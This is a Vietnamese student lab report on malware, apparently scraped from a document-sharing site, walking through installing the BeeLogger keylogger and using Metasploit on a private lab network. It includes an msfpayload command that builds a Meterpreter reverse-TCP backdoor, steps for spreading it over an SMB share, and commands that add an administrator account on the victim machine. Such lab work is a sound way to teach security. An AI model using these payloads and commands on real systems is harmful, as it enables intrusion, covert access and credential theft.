Tải bản đầy đủ (.pdf) (14 trang)
  1. Trang chủ
    2. >>
  2. Luận Văn - Báo Cáo
    3. >>
  3. Kỹ thuật

Báo cáo an tòan thông tin lab 6 malware 2

Bạn đang xem bản rút gọn của tài liệu. Xem và tải ngay bản đầy đủ của tài liệu tại đây (4.77 MB, 14 trang )

<span class="text_page_counter">Trang 1</span><div class="page_container" data-page="1">

<b> TRƯNG ĐI HC SƯ PHM K THUÂT TP.HCM KHOA: CÔNG NGHỆ THÔNG TIN</b>

</div><span class="text_page_counter">Trang 2</span><div class="page_container" data-page="2">

<b>Lab 6. Malware</b>

1. Keylogger

- Download zip file keylogger: Unzip: unzip BeeLogger-master.zip

</div><span class="text_page_counter">Trang 3</span><div class="page_container" data-page="3">

- Chuyển cd vào folder: cd BeeLogger-master

- Cài đặt file: ./install.sh

+ Chuyển quyền root và tăng quyền cho install.sh

+ ./install.sh

</div><span class="text_page_counter">Trang 4</span><div class="page_container" data-page="4">

- Khi cài đặt, nó sẽ tự cài đặt python

- Run file: python bee.py

</div><span class="text_page_counter">Trang 6</span><div class="page_container" data-page="6">

(192.168.2.135) Backtrack 5 r3 (192.168.2.136)

1 Dùng cho Attacker

- Cài đặt IP trên window XP

- Cài đặt IP trên Backtrack 5r3

</div><span class="text_page_counter">Trang 7</span><div class="page_container" data-page="7">

<b>Bước 1: truy cập vào thư mục /pentest/exploits/framwork</b>

#cd /pentest/exploits/framework

<b>Bước 2: Đánh lệnh msfconsole</b>

#msfconsole

</div><span class="text_page_counter">Trang 8</span><div class="page_container" data-page="8">

<b>Bước 3: Tạo Virus có tên dev.exe </b>

msf>msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.2.136 LPORT=4444 X >/root/dev.exe

<b>Bước 4: Thực hiện phát tán virus đến máy nạn nhân.</b>

- Tạo folder SHARE trên máy nạn nhân

</div><span class="text_page_counter">Trang 9</span><div class="page_container" data-page="9">

- Bật sharing

- Máy atcker : vào smb để chuyển file sang máy nạn nhân

</div><span class="text_page_counter">Trang 10</span><div class="page_container" data-page="10">

Chuyển file thành công

</div><span class="text_page_counter">Trang 11</span><div class="page_container" data-page="11">

<b>Bước 5: Khai thác máy nạn nhân</b>

Sau khi nạn nhân chạy file dev.exe thu được backdoor

- Xem các lệnh đang running: ps

</div><span class="text_page_counter">Trang 12</span><div class="page_container" data-page="12">

- Tạo thư mục trên máy nạn nhân:

meterpreter> mkdir C:/yahana_21110432

- Tạo user có quyền admin trên máy nạn nhân:

meterpreter> shell net user GiaHan /add

net localgroup administrators GiaHan /add

</div><span class="text_page_counter">Trang 13</span><div class="page_container" data-page="13">

Trên máy nạn nhân

</div>

Tài liệu liên quan

Tài liệu bạn tìm kiếm đã sẵn sàng tải về

Tải bản đầy đủ ngay
×